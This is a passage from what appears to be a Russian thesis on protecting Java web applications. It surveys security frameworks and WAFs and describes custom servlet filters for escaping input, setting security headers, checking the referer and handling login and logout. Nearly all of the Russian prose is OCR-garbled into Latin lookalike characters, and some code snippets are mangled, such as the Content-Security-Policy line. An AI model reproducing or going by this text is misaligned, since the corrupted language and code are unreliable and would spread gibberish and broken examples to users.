d,e6ai repbi Maine Bcero Hcnojib3yiOT caMH pa3pa6oTHHKH 
AJia noHCKa oihh6ok b kohc. Ho namibic HHCTpyMeHTbi 
Moryr 6biTb nojie3Hbi h npn TecTax Ha npoHHKHOBeHHe, 
Korna mo>kho MCim b Bxonnbie napaMeTpbi h 
aHajiH3HpoBaTb OTBeTbi npHJiovKeiiHa Ha hhx. 

npHMepoM Taxoro HHCTpyMeHTa sBJiseTca Bco-oniaa mhk 
Fiddler. 3to OTJiaaoHiibiH npoxcn, KOTopbiii Jiornpycr Becb 
HTTP-rpa(|)HK, aHajiH3HpyeT ero, npcnociaBJiaci 

B03M0>KH0CTb CTaBHTb TOHKH OCTaHOBa H MCI m b 

BxonaniHe/HCxoflaniHe namibic. 
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1.3. CymecTByiomHe peiuemiH 

1.3.1. BHeapaeMtie Ha 3Tane paspaSoTKH 

IlpH pa3pa6oTKe Bc6-npHJio>KcnH>i ncjibBx 3a6biBaib o 
ero 6e3onacHOCTH: MexaHH3Max ayreHTH(})HKaii,HH, 

HIH(f)pOBaHHH, KOHTpOJie flOCTyna, 3aiHHTC 

KOiK|)H^cnuHaj[bnb[x riamibix nojib30BaicjiCH h uponcM. 
Mo>kho pcajiH30BbiBaib Bee sto caMOCioaicjibiio, ho He 
CTOHT 3a6bIBaTb, HTO MHOrHe HHCTpyMeHTbl OOCCIICMClIHa 
6e3onacHOCTH y>Ke cyuicciByioi h ycneniHO npHMCiouoTca 
B BHfle pa3JIHHHbIX (})peHMBOpKOB H 6 m6j[HOTCK. CpCHH 
flOCTOHHCTB TBKHX peHieHHH MOIKHO OTMeTHTb HBJIHHHe 
flOKyMeHTaH,HH, HHCTpyKH,HH lipHMCnClIHa flJIB pa3JIHHHbIX 
cu,eHapHeB Hcnojib30BaHHa. TeM He MeHee, Hcnojib30BaHHe 
tbkhx cpcHCiB He MO>KeT rapaHTHpoBaTb OTcyrcTBHe 
ya3BHMOCTeH B I [pHJIO/KClI HH, n03T0My HaHJiyHHIHM 
BapnaHTOM aBjiaeTca hx BbiaBJicinic c noMOuibio 
pa3JiHHHbix cxaHepoB h TecTOB Ha npoHHKHOBeHHe, a nocjie 
- ycTpaHeHHe iiatincmibix opewcii c npiiMcneiiHCM 
(J)yHKH,HOHajIbHOCTH lOIOBblX peHieHHH. 

flajiee oy/iyr paccMOTpeHbi npHMepbi roTOBbix pemeHHH 
fljia Be6-npHJio>KeHHH Ha Java. 
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Spring Security 

Spring Security - 3 to Java/JavaEE ^peirMBopic, Koiopbiii 
iipcaociaBJiaei MexaHH3Mbi aJia C03aaiiHa chctcm 
ayreHTH(|)HKaii,HH/aBTopH3aii,HH h apyinc (J)yHKii,HH 
oSecncMCiiHa 6e3onacHOcm # jib npnjioaceHHH, 

peajiH30BaHHbix c noMombio Spring Framework. 

Kohtckct 6e3onacHOCTH co3flaeTca b BH^e xml-cf)aima c 
onncaHneM pecypcoB, npaB aoci yna n npHBHJierHH. 

Apache Shiro 

Apache Shiro - Java (jipcfiMBopK c OTKpbiTbiM ncxoanbiM 
KOflOM, npcaociaBJiaiOLnnii MexaHH3Mbi ayTeHTmjmicaipiH, 
aBTopH3an,HH, mn(|)poBaiin5i n ynpaBjiemia ceaHcaMH. 

/Jjia peajiH3an,HH ayreHTinfiHKaitHH b Shiro hmciotch 
TOK eHbl - KJIIOHH flJIB BXOfla B CHCTeMy, HanpHMep, 
UsemamePasswordToken, 3aaaiOLHHii hms nojib30Baicjia n 
naponb, a TaioKe pcajimyiOLnnii Hmcp(|)ctic 
AuthenticationToken, oiiHCbiBaiouiMH nojiyHCiinc 
nojiHOMOHHH n npaB flocTyna. 

Java Authentication and Authorization Service 

JAAS HBJiacxca pacinupacMofi 6 m6jihotckoh, 
pcaj[H3yiOLneii cianaapi cncTeMbi HH(|)opMaii,HOHHoii 
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6e3onacHOCTH PAM. OcHOBHas 3a^ana JAAS - pa3flejiefflie 
ayTeHTH(j)HKaiI,HH H aBTOpH3aU,HH OT OCHOBHOH 
(J)yHKU,HOHajIbHOCTH lipHJIO/KCHHa. 

CHCTeMHoro a^MHiincipaiopa JAAS npc^ciaBJiaci 
co6oh flBa KOH(j)Hrypaii,HOHHbix (jjafraa: 

*.login.conf onpaucjiacT jioruii-MO^yjiH, h KaK 

IICOOXO^HMO 3a^CHC'I BOBai b HX B npnjio>KeHHH; 

* .policy oiipc^cjiaci npHBHJieraH nojibiOBarcjiCH. 

/Jjia paapaSoiMHKa JAAS hbjihctch ciaiwapiiiOH 
6H6jiHOTeKOH, iipc^ociaBJiaioLucH: 

• npc^ciaBJiciiHC cymHOCTH h nadopa iiojiiiomomhh; 

• cjiy>K6y Bxofla; 

• cjiy>K6y npoBepKH najiMHua y cySbCKia ncooxo^HMbix 
nojiHOMOHHH fljia Hcnojib30BaHH» (|)ynKL[Honaj[bnoc'i H. 

j Guard 

jGuard - 3 to ondjiuoiCKa c OTKpbiTbiM hcxoahbim 
KO flOM, pcaj[H3yiOLUaH ayTeHTH(J)HKaiI,HK) H aBTOpH3aU,HK) 
fljia Be6-npHJio>KeHHH. jGuard HanucaHa Ha ochobc JAAS, 
ciaGujibnoio KOMnoHeHTa JAVA J2SE API. jGuard 
hbjihctch i h6khm HHCTpyMeHTOM h iipcHOCxaBJuiCT pa3Hbie 
cnocodbl HaCTpOHKH MexaHH3MOB ayTeHTH(j)HKaiI,HH H 
aBTOpH3an,HH. 
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1.3.2. BHe/jpaeMbie Ha 3Tane 3KcnjiyaTauHH 

ooccncMCiiHH 6e3onacHOCTH y>Ke 3 kc i ij i yarn p yc mo i o 
npnjio>KeHHa Hcnojibayiorca BHeniHHe HHCTpyMenrbi 
3amHTbi, HanpHMep, CHCTeMbi oonapy/KCiiMx BTopaceHHH, 
Me>KceTeBbie 3Kpanbi, a TaK>Ke cpcaciBa (|)HJibTpaii,HH 
Tpa(J)HKa upHKJiaanoro ypoBiia, cncuHajiHanpyiOLuncoi Ha 
Bc6-npHJio>KcnHax (WAF - Web Application Firewall). 
IlocjicaiiHC iipeanoHTHTCJibiibi, Tan KaK paapaSaibiBaioica 
KOHKpeTHO aJia 3aLHHTb[ Be6-npHJIO>KeHHH, H B OTJIHHHC OT 
apyiHx cpcacxB, He neperpy>KeHbi paajiHMiibiMH 
(jiyiiKHnaMH, hto oSjici Haci hx aa mhii ncrp h poBan hc. 

WAF Moryr 6biTb peajiH30BaHbi kbk oojiamibiH cepBHC 
(fljia cpcanci o h Majioro Snancca), oiTJCJibiioe >Kejie30 hjih 
BHpTyajibHoe ycTpoircTBO (KpynHbiH 6m3iicc). WAF oSbimiio 
Hcnojib3yeTca b pe>KHMe oSpamoro npoxcH-cepBepa, ho 

B 03 M 0 >KHbI H /ipyi'HC pe>KHMbI, HanpHMep, naCCHBHblH, 
Kor.ua npHJioaceHHe pabo i aci c penjiHKau,HeH Tpa(J)HKa. 

Ilocjie ycTaHOBKH WAF h aanycKa Tpa(f>HKa BKjnoHaci ca 
OCHOBHOH MexaHH3M UaiHHTbl - MaHIHHHOe OOyHClIHC, 
(|)Op\lHpyiOLHee 3T aJIO HHyK) MOaCJIb COCamiCIIMa c 
oSbeKTOM aaiHHibi, h, TaKHM o6pa30M, aanojinacica 
«6ejibiH» ciihcok aonycxHMbix MucmM(|)MKaTopoB flocTyna. 
B nacioauiee Bpe\ia b Be6-npHjio>KeHH»x ncnojibuyiOTca 
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CJic/iyiOLUHC BHflbi H^cmM(|iHKaiopoB: HTTP-napaMeTpbi, 
ID pecypca, ID ceaHca (cookie). WAF Bannwacica 
onpcacjiciiHCM aonyci HMbix 3iiaHCiinM fljia npHJiovKCiiHa. 

KpoMe ManiHHHoro ooyMCiiHa WAF Taioice HMeeT 
CJicayiouiHC MexaHH3Mbi oocciichciimh 6e3onacHOcm: 

• npoBepKa npoTOKOJia h aHajiH3 noflnHCH; 

• 3amHTa ot HirbCKUHH h XSS (Macro nponpMCTapnax); 

• C03aaiiHC coSci Bcmibix npaBHJi 3amHTbi; 

• 3anpiTa ot DDoS-aTax; 

• Hinci pauMH c penyTau,HOHHbiMH cepBHcaMH. 

06mne ipcooBaiiHH k coBpeMeHHOMy WAF: 

• pearapoBaHne Ha yrpo3bi H3 OWASP Top- 10; 

• HHcneiempoBaHHe b cooTBeTCTBHH c hojihthkoh 
6e3onacHOCTH, BorapoBaHHe coSmthh; 

• npcaoTBpameiiHC yiCHKM aamibix; 

• npoBepKa coacp>KHMoro CTpaHHH,, BKjnoHaa HTML, 
CSS, h npoTOKOJibi aoc i aBKH (HTTP/HTTPS); 

• aaiiiH i a ot yrpo3, HanpaBJieHHbix Ha caM WAF; 

• iipcaoi BpaLHeiiHc/oSnapy/KCiiHC iio/tucjikm ID ceaHca; 

• aBTOMaTHnecKoe oShobjiciimc cmiiaryp araK; 

• noaqep>KKa SSL-cepTH<f)HKaTOB; 

• noanepacKa annapaTHoro xpancnriH KjnoneH (FIPS). 


50 



2. Pa3pa6oTaHHbie nporpaMMHbie 
cpeacTBa 


2.1. Oimcamie pa3pa6oTaHHbix 
nporpaMMHbix cpe^CTB 

2.1.1. ApxHTeKTypa 

Be6-npHJio>KeHHa pa3pa6aTbiBaiOTca Ha ochobc 
apxHTeKTypbi «KJiHeHT-cepBep». B KancciBC cepBepa MO>KeT 
6biTb Hcnojib30BaH KOHTeHHep cepBJieTOB. CepBJieT 
BBJiaeTca Hmcpc|)CMCOM Java, peajiH3au,Ha KOToporo 
pacHinpaeT (JiyHKHHOHajibHbie bo3mo>khocth cepBepa, h 
B3aHMOfleHCTByeT c KJiHeHTaMH noepeflCTBOM npHHH,Hna 
3anpoc-OTBeT. Tax KaK Java - ^ociaiomio nonyjiapnaa 
iuiai(|)opMa fljia peajiH3au,HH KpoccnjiaTtfiopMeHHbix Be6- 
npHJio>KeHHH, BbiSop nan hmciiiio Ha Hee. 

B Beo-npHJiovKCiiHax kjihciit ouipaBJiaci 3anpoc Ha 
cepBep fljia o6pa6oTKH cepBJieTOM. Ilpn 3tom 3anpoc, a 
TaK>Ke OTBeT KJincmy, mo>kho npe^BapHicjibiio o6pa6oTaTb 
c noMOHjbK) cepBJieTHoro (ftHJibTpa - Java-KOfla, 
npHroflHoro flJia noBTopHoro Hcnojib30BaHHH h 
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II03B0JIHI0LUCI0 MOflH(j)HLI,HpOBaTb /jailllblC HTTP- 
3anpOCOB/OTBeTOB H HH(J)OpMaiI,HK) B 3arOJIOBKaX. 

ooccncMcnHH 6e3onacHOcm Be6-npHJio>KeHHH 6 bijio 
npHHBTO pemeHHe o pa3pa6oTKe ccpBJicnibix (JmjibTpoB, 
o6pa6aTB>iBaiomHx 3anpocbi RjiHenra h o i BCi bi cepBepa. 

B KancciBC cpe^bi pa3pa6oTKH 6bm BbiSpana Intelllj 
IDEA - HHTerpHpoBaHHaa cpe#a pa3pa6oTKH 
nporpaMMHoro oocciicmciihh Ha miioihx a3biicax 
nporpaMMHpoBaHHB, b hbcthocth Java, JavaScript, Python, 
paapaSoiaimaH KOMiiaiiHcii JetBrains. 

2.1.2. CepejieTbi h cepejieTHbie (JiHJibTpbi 

CepBJieTbi cnocoSiibi o6cjiy>KHBaTb jnoSbic bh^m 
3anpocoB, ho thhhhhoc Hcnojib30BaHHe cepBJieTOB - 
pacniHpeHHe Be6-cepBepoB. ,3 ,jui 3Toro b Java onpe#ejieHbi 
cneu,HajibHbie HTTP-KJiaccbi cepBJieTOB, HanpnMep, 
HttpServlet. OcHOBHbie nepeonpe^enaeMbie b cepBJieTe 
MCio^bi: doGet (BbinojiiiciiHC fleiicTBHH npn nojiyneHHH 
GET-3anpoca) h doPost (BbinojiiiciiHC .uchctbhh npn 
nojiyneHHH POST-3anpoca). 

PaccMOTpHM >KH3HeHHbiH li,hkji cepBJieTa: 

1) CepBJieT oTcyrcTByeT b KOHTeHHepe: 

A) 3arpy3Ka KJiacca cepBJieTa b KonreiiHep. 
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E) CoBjiannc 3K3CMiiJ[Hpa KJiacca cepBJieTa. 

B) Bbi 30 b MCTO.ua init() - niinnnajin3aLinH cepBJieTa, 
Bti3BiBaeTCfl b nepByio onepeub n TOJibKO ouhh pa3. 

2) CepBJieT o6cjiy>KHBaeT 3anpoc KJincma. 3anpocbi 
oopaSaibiBaioTCM b oxuejibHbix noTOKax mctouom 
service(), onpcucjononiHM ran 3anpoca n 
pacnpcuejouoniHM b cooTBeTCTByiomne mctoubi 
o6pa6oTKn. 

3) CepBJieT yjjajiMCiCH mctouom destroy() b cjiynae 
HeodxOflHMOCTH. 

Kaic n b cjiynae c cepBJieTOM, cepBep Bbi3biBaeT mctou 
init(FilterConfig config), HHHn,najiH3HpyK)mHH n 
KoiK|)Mi ypnpyioinHH (|jMJib i p. Mctou doFilter odpadaTbiBaeT 
3anpocbi n OTBeTbi. Ilocjie OKonianna padoi bi Bbi3biBaeTca 
mctou destroy(). 

B mctou doFilter b Kanecrae bxouhoio napaMeTpa 
npnxoflHT cnncoK (|)HJibipoB uua odpadoTKn FilterChain 
chain. Flocjie odpadoran 3anpoca/oraeTa, c|i mji b i p Bbi3biBaeT 
chain.doFilter u-xa nepeuann ynpaBjieHna cjicuyiomcMy 
(})HJibTpy. 

Onjibipbi padoxaiOT b tom nopxuKC, b kotopom 
odbHBjniio'iCH. 06'bHBJixeiCM (|)HJibip BHyTpn 3JiCMcma 
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<filter>, no^KJiiOHaciCH BHyipn <filter-mapping> b (Jjainie 
web.xml. 


2.1.3. PaapaSoTaHHbie (JiHJibTpbi 

RequestEscapingFilter - (|iMJibip 3KpamipoBaHH» 
flaHHbix 3anpoca. 

3KpaHHpoBaHHe - 3aMeHa cneuHajibiibix ynpaBJiaiomux 
CHMBOJIOB B TeKCTe Ha COOIBCICIByiOLHMC 3KBHBajieHTbI. 
3jioyMbimjieHHHK mojkct Hcnojib30BaTb tot (J)aKT, mo 
npnjio>KeHHe He ocymecTBjiaeT npoBepKy bxo/hibix namibix 
flOJDKHbiM o6pa30M, BHeflpflfl HHbeKu,HH, HanpHMep, 
BpeflOHOCHbiH CKpmn b HTML-CTpammy, OTo6pa>KaeMyio 
b 6pay3epe; aonojiiimcjibiioe ycjiOBHe hjih u,ejibiH 3anpoc b 
napaMeTp, Hcnojib3yeMbiH b SQL-Bbipa>KeHHH. /Jjih samurai 
ot SQL-HHbeKH,HH jiyHiue Bcero nojib30Baraca 
noaiO'iOBJicmibiMH 3anpocaMH, b KOTopwx hctko 
yKaabiBac'ica hhcjio h ran napaMeTpoB. Ho b ncKOiopbix 
CJiynaax hx Hcnojib30BaHHe HeB03M0>KH0 hjih ^oporo b 
IIJiaHe npOH3BOflHTeJIbHOCTH. B CBA3H C 3THM 
3KpaHHpOBaHHe TaiOKe HBJIHCTCH CpCHCTBOM 3amHTbI OT 
SQL-HHbeKH,HH. 

HcOOXOJIHMO 3KpaHHpOBaTb CJICJiyiOLHMC CHMBOJIbi: 

" &# 34 ; 
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$ 

% 

& 


&#36; 

&#37; 

&# 38 ; 

&#39; 

&#42; 

&#59; 

< &#60; 

> &#62; 

{ &#123; 

I &#124; 

} &#125; 

TJamioc npeo6pa30BaHHe npoMCxo/u-n b Mcronax 
pa3pa6oTaHHoro KJiacca Escaper. Oh coflep>KHT MeTOflbi 
String escape(String s), StringBuffer escape(StringBuffer s), 
String escapeQuery(String s) n String escapeHeader(String 
s). Bo Bcex cjiynaax BHyTpn mctohob co3nacica HOBbin 
3K3C\nunip StringBuilder (StringBuffer fljra StringBuffer 
escape(StringBuffer s)), b KOToptin /looaBjnuoiCH 
HeynpaBjnnomne chmbojibi bxohuoio napaMeTpa, a 
ynpaBjnuoLHMC 3aMeHaiOTca Ha cooiBCiciByiouiHC 
6e3onacHbie 3KBHBajieHTbi. 

/fjni 3KpaiiHpoBanHH ^aHHbix 3anpoca peajin30BaH KJiacc 
RequestWrapper, nacjicnyiouiHii KJiacc 
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HttpServletRequestWrapper. 3tot KJiacc hbjihcioi 
ooojiohkoh fljia nocTynaiomero 3anpoca. 3to 3 nan hi, hto 
eCTb B03M0>KH0CTb IICpCOnpCnCJIHTb MeTOflbl get 3lia L ICIIHH 
napaMeTpoB, 3arojiOBKOB h nponero, h B03BpamaTb 
3KpaHHpoBaHHbie aamibic. ncpeonpcacjiciibi MCTonbi: 

String getRequestURI() - nacTb URL, naHHiiaa c hmciih 
npoTOKOJia flo ctpokh 3anpoca; 

String getQueryString() - CTpoKa 3anpoca; 

String getParameter(String parameter) - napaMeTp 3anpoca; 
Cookie[] getCookies() - anaHCima cookie; 

String getHeader(String name) - bothciihc 3arojiOBKa. 

ResponseAddHeadersFilter - (})HJibTp ^oSaBJieima 
3arojiOBKOB b OTBeTbi cepBepa. 

fl,jia oocciichciihh 6e3onacHOCTH bco-iiphjiovkciihh 
T aK>Ke Hcnojib3yioiCH 3arojiOBKn OTBeTOB cepBepa. 
^onojiHHTejibHbie HTTP-3arojiOBKH MoryT cnjibHO 
ycjio>KHHTb 3JioyMbimjieHHHKy ocyincciBJicnHC aTaic inna 
BiieapciiMC Koaa, «hcjiobck iioccpcnHiiO) n nponne. 
HeKOTopbie TaKne 3arojiOBKH Moryr He iioaitcp>KHBaibCH 
HeKOTopbiMH 6pay3epaMH, ho sto He 3 nan hi, hto ot TaKoii 
HOIIOJIlIHTCJIbllOH 3aiHH I bI CTOHT COBCeM OTKa3bIBaTbC3. 
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3arojiOBOK X-XSS-Protection movkct npcaoiBpaiHib 
ncKO iopbic aTaKH THna MOKcatnoBbitf CKpmiTHHr, sBJiaeTca 
coBMecmMbiM c Chrome, Opera, Internet Explorer 8+, 
Android n Safari, MCiioJibBycrca Google, Github, Facebook 
n MO>KeT npnHHMaTb cjicayiomnc 3HaneHHa: 

0 - BCTpoeHHaa 3amma BbiKJiiOMcna; 

1 - 3auima BKjnoMcna, CTpaHHii,a nonBcpracTca n,eH3ype 
npn aTaKe; 

1; mode=block - aauima BKjnoMcna, CTpaHHii,a He 
oopadaxbiBacTCfl npn aTaKe; 

1; report=http://example.com/report - aauim a BKjnoMcna, 
orapaBJiaeTca othct npn aTaKe. 

B (|)HJibTpe Hcnojibayc'iCM cjicayiOLHMH napaMeTp: 
resp.addHeader("X-XSS-Protection", "1; mode=block") 

3arojioBOK X-Frame-Options MO>KeT npcaoiBpaiHib 
Clickjacking-aTaKH h hbjihcich ycTaHOBKoii ana 6pay3epa 
He 3arpy>KaTb Barny CTpaHHuy b frame/iframe. Clickjacking- 
aTana aaKjnoMacica b CJicnyiomeM: 3JioyMbiniJieHHHK 
3arpy>KaeT cboio CTpaHHuy b ncBHnHMbitf cjioh noBepx 
BHAHMOH BHeiHHe OCBOOHailOH CTpaHHH,bi; 3JieMeHT 
ynpaBJicnna Bpcnonocnoii CTpaHHH,bi cobmclhcii c bhahmoh 
ccbiJiKon/KHonKOH; Hcnojibaycica aTaKa ana noanncKH Ha 
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pccypcbi, xpaacn KOiK|)H^cnuHaj[bnbix ziamibix. 3arojiOBOK 
i io/i^ep>KH Bacica He bccmh 6pay3epaMH. MoaceT 
npHHHMaTb CJIC/iyiOLHHC 3HaHeHH»: 

SAMEORIGIN - 3arpy3Ka KOHTeHTa b frame/iframe 
pa3pemeHa TOJibKO b tom cjiynae, Kor^a (|)peHM h 
3arpyacaioma» CTpaHHH,a pacnojiovKCiibi Ha o^hom homciic; 

DENY - 3arpy3Ka KOHTeHTa b (f)penMax aanpcuiena; 

ALLOW-FROM - 3arpy3Ka KOHTeHTa b frame/iframe 
pa3pemeHa TOJibKO rjik onpcncjicmioro EiRL. 

B (})HJibTpe Hcnoj[b3yci CH cjicnyiomHu napaMeTp: 

resp.addHeader("X-Frame-Options", "DENY") 

3arojioBOK X-Content-Type-Options Hcnojibaycica ^jib 
npcHOTBpamcnna aTaK, ncuojib3yioiunx nonMciiy ihiiob 
MIME (Multipurpose Internet Mail Extensions). B 
3arojiOBKe HaxoABTca ycTaHOBKH no oupcncjicnmo inua 
(Jjanjia, 3 a cneT nero He flonycKaeTca nepexBaT naneTOB. 

B (J)HJibTpe ncnojib3yeTca cjicnyiomHH napaMeTp: 

resp.addHeader("X-Content-Type-Options", "nosniff") 

3arojioBOK Content-Security-Policy onncbiBaeT 
flonycTHMbie pecypcbi, HanpnMep, H3o6paaceHna n Me^na, 
ycTaHaBJiHBaeT npaBHJia ncnojib30BaHna BCTpoeHHbix 
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CKpmiTOB, mpH(f)TOB h CTHneM. 3arpy3Ka H3 hctohhhkob, He 
BKJHOHeHHbIX B «6eJIbIH» CnHCOK, OJIOKHpyC'ICM. 3arOJIOBOK 
^OJi/Kcn coflep>KaTb OAiiy hjih 6onee ampckthb ajih 
pecypcoB. ^HpeKTHBa default-src oiiHCbiBaer AonycTHMbie 
HCTOHHHKH nO yMOJIHailHIO flJIB BCeX flHpeKTHB. B cnHCKe 
URL a^peca pa3Aeji»K>TC» npodejiaMH, ‘self’ - ccbunca Ha 
TeKyHjHH flOMeH, ‘none’ npuMcnacTCH, Kor/ja He Hy>KHO 
nuncio 3arpy>KaTb b paMKax Aamiou AupcKTUBbi. 

B (|)MJibxpc Hcnojib3yeiCH CJiCAyioiHuu napaMeTp: 

resp.addHeader("Content-Security-Policy", "default-src 
‘self") 


ReferrerFilter - (|) hji bip npoBepKH 3arojiOBKa referer. 

,3,jui odecneneHna npocTeHHieH lauiuTbi ot araK runa 
noAflenKa MOKcaifiOBbix 3anpocoB mo>kho Hcnojib30BaTb 
3arojiOBOK 3anpoca referer (pacnpocipancmiaH omndica 
HanncaHHa cjiOBa referrer OKa3ajiacb HacTOJibKO 
pacnpocTpaHeHHOH, hto Bonuia b o(f)HH,HajibHbie 
cnen,H(f)HKaLi,HH HTTP-npoTOKOJia). Referer coAepacHT URL 
HCTOHHHKa 3anpoca h oobimio ucnojibayciCH AJia cdopa 
CTaTHCTHnecKHx Aamibix o tom, icaic nojib30BaTejiH nonajin 
Ha caifr: no noncKOBOMy 3anpocy, no ccbuiKe Ha ApyroM 
caifre, hjih ot KOHKpeTHoro peKJiaMOAai cjia. 
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/JamibiH (J)HJibTp npoBcpxc'1, cooTBeTCTByeT jih 
3arojiOBOK referer 3anpoca yKa3aHHbiM b napaMeTpax 
validPatterns (|iHJibipa maSjioiiaM. B cjiynae, ecjiH 3anpoc 
npHinen ot HeH3BecTHoro HCTOHHHKa, npoHCxottHT 
nepeHanpaBJieHHe Ha yica3aHHyio b napaMeTpe redirectTo 
CTpaHHH,y. Bee anaMCiiHM napaMeTpoB HHHH,HajiH3aii,HH 
(})HJibTpa flOJDKHbi 6biTb yKa3aHbi nepea 3aim yio, HanpHMep 
fljia validPatterns (nan h nan c hmciih npoTOKOJia): 
http://example/test/,http://exam/pass/ 

^aHHbiH (J)HJibTp cjic^yci Hcnojib30BaTb b KanecTBe 
nonojNieiiHH k ctohkoh CHCTeMe ayreHTH(J)HKaii,HH, 
HCI[OJIb3yiOLHCH aHTH-CSRF TOKeH. 

LoggedlnFilter - (})HJibTp npoBepRH 11 aj i m h m h b ceccnn 
ayreHTH(J)HLi,HpoBaHHoro nojibaoBaicjia. 

Be6-npHJio>ReHHB ^oji/Kiibi npc^ociaBJiHib ctohkhc 
MexaHH3Mbi ayreHTH(J)HKaii,HH h aBTopH3au,HH. Ilpn 3tom He 
ctoht 3a6biBaTb o npoBepRe HajiHHHa npaB Ha 
3anpomeHHbiH pecypc y nojibBOBaiejia. K npHMepy, 
ocyuicciBJHic'iCH Bxofl b yHcmyio 3anHCb: mctohom POST 
0'iiipaBJiHC'iCM 3anpoc, co#ep>RamHH jiothh h napojib, 
cepBep odpadaTbiBaeT ero, iiaxo/inr aamioro iiojibBOBarcjia 
b 6a3e ziamibix, npoBepaeT Ha cooTBeTCTBHe napojin, a 
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3aTeM iiepcnanpaBJixcT KJiHenra Ha CTpaHHH,y ycneniHOH 
aBTopH3au,HH hjih npoc|)HJui noj[b30BaicJ[H. Ho Her 
HHKaKOrO TOJIKy OT TaKOH aBTOpH3aU,HH, eCJIH n0JIb30BaTeJIb 
He uoSaBJiaeTca b napaMeTp ceccnn, h npn Ka>KHOM 3anpoce 
CTpaHHH,bI, ZIOC'iymiOH TOJIbKO flJIB aBT0pH30BaHH0r0 
K)3epa, He npoHexouHT npoBepKa HajiHHHa 
eooTBeTCTByiOHiero napaMeTpa b ceccHH. Ecjih sto He 
coojiiohciio - Ha CTpaHHH,bi npocjiHJia mo>kho nonacTb, 
MHHya CTpaHHH,y Bxoua, npocTO naopaB URL- rupee. 

,Zl,aHHyio npoSjiCMy h pemaeT LoggedlnFilter. Oh 
npoBepaeT ceccHio h ee arpnGyr c Ha3BaHHeM, 3auaBaeMbiM 
b napaMeTpax HHHH,HajiH3aii,HH (|iHJibipa. KpoMe Toro, 
3auaiorca uonycraMbie h aaiipcmcmibic aupcca u-aa 
HeayTeHTH(f)Hii,HpoBaHHoro h ayicmH(|)HUHpoBamioro 
iioj[b30Baicj[H, a TaK>Ke CTpaHHH,bi, Ha KOTopwe cjicuyer 
nepeHanpaBHTb K)3epa. 3naicnMH aupccoB b napaMeTpax 
HHHH,HajIH3aU,HH flOJDKHbl 6bITb paiUCJICHbl 3aiIHT0H, 
HanpHMep: /login,/locale 

LogOutFilter - c[)HJibTp Bbixo.ua H3 ync inoir 3anHCH. 

KpoMe npaBHJibHoro Bxoua b yiemyio 3araicb 
ncooxouHMO opraHH30BaTb TaK>Ke Bbixou H3 Hee. Ecjih sto 
He coSjiiouciio, uamibie ceccnn Moryr coxpaHHTbca. Ecjih 
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3to o6mecTBeHHbiii nK, a nojib30BaTejib Bbimeji H3 aKKayHTa 
h ynien, jiioSoh nepe3 HeKOTopoe BpeMs CMoaceT bohth b 
flaHHbiii aKKayHT, MHHya cxpannuy jioraHa, h BbinojiHHTb 
XICHC'IBHH OT HMeHH aBT0pH30BaHH0r0 II0JIb30BaTCJIH, 
nojiyHHib jioraH/napojib h npoHHC KOiK^H^cnuHajibiibic 
Ziamibic. 

L Iio6bi yflajiHTb aipuSyi bi ceccHH, iicooxo^hmo Bbi3BaTb 
MeTOA session.invalidate(). Ho .zjaace nocne 3Toro HeT 
nonHOH yBepeHHOCTH, hto ziamibic 6y#yT yziajici i bi. 
HeKOTopbie 6pay3epbi Kcmnpyiox cxpammu, a c hhmh h 
napaMeTpbi ceccHH. Mio6bi H36e>icaxb sxoro, aic^yci 
ycTaHOBHTb CJic^yiouiHC anaHCiiMH 3arojiOBKOB OTBeTa: 
resp.setHeader("Cache-Control", "no-cache, no-store") 
resp.setHeader("Pragma", "no-cache") 
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2.2. TecTHpoeaHHe 

2.2.1. ApxHTeKTypa TecToeoro npiuioaceiniH 

TecTOBoe Be6-npnjio>iceHHe pa3pa6oTaHO Ha ochobc 
apxHTeKTypbi «KJiHeHT-cepBep», r^e KJincmoM hbjihctch 
Be6-6pay3ep, a cepBepoM - KonrenHep cepBJieTOB Tomcat. 

Cepeep: 

Apache Tomcat 7.0.73 - KonrenHep cepBJieTOB c 
OTKpbiTbiM HexoflHbiM KOflOM, pa3pa6aTbiBaeMbin Apache 
Software Foundation. Peajin3yeT cncuH(|)HKanHio cepBJieTOB 
n cncuH(|)HKauHio JavaServer Pages (JSP) n JavaServer 
Faces (JSF). Tomcat iiobbojihct 3anycKaTb Be6- 
npHJiovKCima, co^cp>KHi pxjx nporpaMM ^ jib 
caMOKOHtfmrypnpoBaHHa. Tomcat ncnojib3yeTca b xanecTBe 
caMOCToaTejibHoro Be6-cepBepa, b xanecTBe cepBepa 
Konrenra b coneTaHnn c Be6-cepBepoM Apache HTTP 
Server, a Taioice b xanecTBe KonrenHepa cepBJieTOB b 
cepBepax npnjio>KeHHH JBoss n GlassFish. 

PosgreSQL 9.5 - CBoSoflHaa o6beKTHO-pejnm,noHHa» 
CyBfl. Hcii0Jib3yc'iCH b npoerre b KanccxBC xpanujiuma 
nojib30BaTejibCKnx /lamibix. TI,jm coc^hiiciihh npnjioaceHna 
c 6a3on iiamibix ucnojibayeiCH JDBC- .upatiBcp (Java 
DataBase Connectivity). 
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JavaServer Pages (JSP) - tcxiiojioihh coanainiH 

CTpaHHU, C HHIiaMHHCCKHM COHCp'/KHMblM. CiaiHHCCKHC 
flaHHbie Moryr 6bm> o(|)opMJicnbi b ouiiom h3 tckctobbix 
(j)opMa T OB HTML, SVG, WML, hjih XML, a JSP- 
3JieMeHTbi Konc'ipyHpyioi nmiaMHiccKoe concp/KHMOC. 
Hcnojib3yeMbiH apxHTeKTypHbiH no#xo# - JSP Model 2, 

KOTOpblH 3aKJ[IOMaC'ICH B COBMeCTHOM HCn0JIb30BaHHH 
cepBJieTOB h JSP-CTpaHHu,. CepBJieT o6pa6aTbiBaeT 3anpoc 
h co3flaeT JavaBcans-odbCKibi, Hcnojib3yeMbie b JSP- 
CTpaHHu,e, BbiBO^HLucHCH b 6pay3epe nojibiOBarcjoi. 
Thiioboh cuenapHH iioaicnoBarejibnocTii .uchctbmh ^ jih 
'lamioil apxHTeKTypbi: 

1) 3anpoc OTiipaBJixcTCx Ha cepBJieT; 

2) cepBJieT o6pa6aTbiBaeT 3anpoc, C03flaeT JavaBean h 
3anpaiHHBaeT unnaMHHCCKOc co^epacHMoe; 

3) JavaBean nojiynaeT flocTyn k HH(j)opMaii,HH; 

4) cepBJieT, nanpaBjnnoLHHH 3anpoc, Bbi3biBaeT 
cepBJieT, CKOMnHJIHpOBaHHblH H3 JSP-CTpaHHH,bi; 

5) CKOMnHJiHpoBaHHbiii cepBJieT BCTpanBaeT 
flHHaMHHeCKOe COHCp'/KHMOC B CTaTHHeCKHH KOHTeKCT 
HTML-CTpaHHu,bi h oi npaBJiHCi otbct KJineHTy. 

HcnoJib3yeMaa cpeaa pa3pa6oTKH: Intelllj IDEA 
